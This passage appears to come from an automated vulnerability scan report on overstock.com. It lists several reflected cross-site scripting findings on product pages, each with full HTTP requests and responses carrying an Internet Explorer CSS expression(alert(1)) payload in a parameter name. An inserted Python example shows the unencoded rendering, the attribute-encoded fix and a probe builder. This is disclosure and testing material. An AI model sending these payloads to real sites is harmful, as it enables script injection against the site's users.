Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:53 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5146644|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:07:53 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111419

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="6a7c0"style="x:expression(alert(1))"55a54c4c9d8" value="1"/>
...[SNIP]...

2.83. http://www.overstock.com/Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9deef"style%3d"x%3aexpression(alert(1))"ea5e7c90a99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9deef"style="x:expression(alert(1))"ea5e7c90a99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html?9deef"style%3d"x%3aexpression(alert(1))"ea5e7c90a99=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:40 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:40 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4395190|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:40 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405140440:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109825

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="9deef"style="x:expression(alert(1))"ea5e7c90a99" value="1"/>
...[SNIP]...

2.84. http://www.overstock.com/Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3a38"style%3d"x%3aexpression(alert(1))"338037914d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3a38"style="x:expression(alert(1))"338037914d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-SE-350-Deluxe-Embroidery-Sewing-Machine-Refurbished/5088223/product.html?f3a38"style%3d"x%3aexpression(alert(1))"338037914d3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:06:08 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:06:08 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5088223|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:08 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405168551:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:08 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113075

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="f3a38"style="x:expression(alert(1))"338037914d3" value="1"/>
...[SNIP]...

2.85. http://www.overstock.com/Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e1ad"style%3d"x%3aexpression(alert(1))"a49a46f4b40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e1ad"style="x:expression(alert(1))"a49a46f4b40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-XR-7700-Computerized-Sewing-Machine-Refurbished/2677829/product.html?4e1ad"style%3d"x%3aexpression(alert(1))"a49a46f4b40=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:43 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:43 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408803560:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2677829|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:43 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:43 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="4e1ad"style="x:expression(alert(1))"a49a46f4b40" value="1"/>
...[SNIP]...
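Findings 2.77 through 2.85 above are one defect seen on nine product pages: the page re-emits every query-string parameter as a hidden form field and copies the parameter name (and the value) into double-quoted attributes without encoding them. The Python below is an added example, not Overstock's code or the scanner's. The two render functions are a hypothetical stand-in for whatever template wrote the `<input type="hidden" ...>` lines in the responses; they reproduce the exact markup from finding 2.77, show the attribute-encoded form that closes the hole, and build a marker-delimited probe of the same shape the scanner used, so that a verbatim echo in the response can be attributed to this request alone.

```python
"""Reflected XSS via an unencoded parameter name inside a double-quoted
attribute: vulnerable rendering, hardened rendering, and the probe/check
used to decide whether the break-out succeeded.  Added example; the render
functions are a hypothetical stand-in for the real page template."""
import html
import re
import secrets
from urllib.parse import parse_qsl

# Constructed sample: the query string from finding 2.77, exactly as it was
# sent on the request line (the double quotes are not percent-encoded).
SAMPLE_QUERY = '78e64"style%3d"x%3aexpression(alert(1))"6d0eb2c7d50=1'


def render_hidden_inputs_vulnerable(query: str) -> str:
    """Mirror the observed behaviour: every query parameter becomes a hidden
    input, and both the name and the value are dropped into double-quoted
    attributes with no encoding at all."""
    pairs = parse_qsl(query, keep_blank_values=True)
    return "".join(f'<input type="hidden" name="{k}" value="{v}"/>' for k, v in pairs)


def render_hidden_inputs_fixed(query: str) -> str:
    """Same output shape, but name and value are HTML-attribute-encoded.
    html.escape(quote=True) turns " into &quot; so the attribute can never
    be closed early; it also covers &, <, > and the single quote."""
    pairs = parse_qsl(query, keep_blank_values=True)
    return "".join(
        '<input type="hidden" name="{}" value="{}"/>'.format(
            html.escape(k, quote=True), html.escape(v, quote=True))
        for k, v in pairs)


def make_probe() -> tuple[str, str]:
    """Build a probe of the shape the scanner used: random hex marker,
    attribute break-out, random hex marker.  Returns (url_form, echoed_form).
    The random markers are what let a verbatim match in the response be
    attributed to this one request, which is what 'Confidence: Certain' rests on."""
    pre = secrets.token_hex(3)[:5]
    post = secrets.token_hex(6)[:11]
    echoed = f'{pre}"style="x:expression(alert(1))"{post}'
    # Percent-encode '=' and ':' as in the report; the quotes stay raw.
    url_form = echoed.replace("=", "%3d").replace(":", "%3a")
    return url_form, echoed


def reflected_unencoded(body: str, echoed_probe: str) -> bool:
    """True when the probe appears in the response byte-for-byte, meaning the
    double quotes survived and the attribute boundary was broken."""
    return echoed_probe in body


# Simplified double-quoted-attribute tokenizer (constructed helper, not a full
# HTML parser): enough to show that the vulnerable markup grows an extra
# 'style' attribute while the fixed markup keeps a single 'name'.
ATTR_RE = re.compile(r'([^\s"=/>]+)="([^"]*)"')


def attribute_names(tag: str) -> list[str]:
    """Return the attribute names a browser-like tokenizer would see in `tag`."""
    return [m.group(1) for m in ATTR_RE.finditer(tag)]


if __name__ == "__main__":
    print("vulnerable:", render_hidden_inputs_vulnerable(SAMPLE_QUERY))
    print("fixed:     ", render_hidden_inputs_fixed(SAMPLE_QUERY))
    url_form, echoed = make_probe()
    for label, render in (("vulnerable", render_hidden_inputs_vulnerable),
                          ("fixed", render_hidden_inputs_fixed)):
        body = render(url_form + "=1")
        print(label, "reflected unencoded:", reflected_unencoded(body, echoed),
              "attributes:", attribute_names(body))
```

Attribute encoding is the right primitive here; URL-decoding differently or filtering `<script>` would not help, because the break-out needs nothing more than a double quote. The value must get the same treatment as the name, since the responses above echo the supplied `1` into `value="..."` as well.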

2.86. http://www.overstock.com/Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efaab"style%3d"x%3aexpression(alert(1))"b871a7a300a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as efaab"style="x:expression(alert(1))"b871a7a300a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Crafts-Sewing/Brother-XR9000-120-stitch-Function-Computerized-Sewing-Machine-w-Alphabet-Font-Refurbished/4363751/product.html?efaab"style%3d"x%3aexpression(alert(1))"b871a7a300a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:06:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:06:01 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4363751|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405161509:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="efaab"style="x:expression(alert(1))"b871a7a300a" value="1"/>
...[SNIP]...

2.87. http://www.overstock.com/Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8ae4"style%3d"x%3aexpression(alert(1))"5d2fb03e202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8ae4"style="x:expression(alert(1))"5d2fb03e202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Crafts-Sewing/Cricut-Personal-Electronic-Cutter/2917502/product.html?f8ae4"style%3d"x%3aexpression(alert(1))"5d2fb03e202=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:05:49 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:05:49 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:49 GMT; Path=/
Set-Cookie: mxcproclicks=2917502|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:05:49 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405149617:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Cr
...[SNIP]...
<input type="hidden" name="f8ae4"style="x:expression(alert(1))"5d2fb03e202" value="1"/>
...[SNIP]...

2.88. http://www.overstock.com/Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb044"style%3d"x%3aexpression(alert(1))"bb9f44acd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb044"style="x:expression(alert(1))"bb9f44acd4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Crafts-Sewing/Janome-Sew-Mini-Sewing-Machine-Refurbished/4395707/product.html?bb044"style%3d"x%3aexpression(alert(1))"bb9f44acd4b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:41 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4395707|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:41 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408801080:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Ja
...[SNIP]...
<input type="hidden" name="bb044"style="x:expression(alert(1))"bb9f44acd4b" value="1"/>
...[SNIP]...

2.89. http://www.overstock.com/Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcafa"style%3d"x%3aexpression(alert(1))"f0fceb1f023 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcafa"style="x:expression(alert(1))"f0fceb1f023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Crafts-Sewing/Shark-Mini-Portable-Dress-Maker-Sewing-Machine/4124237/product.html?bcafa"style%3d"x%3aexpression(alert(1))"f0fceb1f023=1 HTTP/1.1
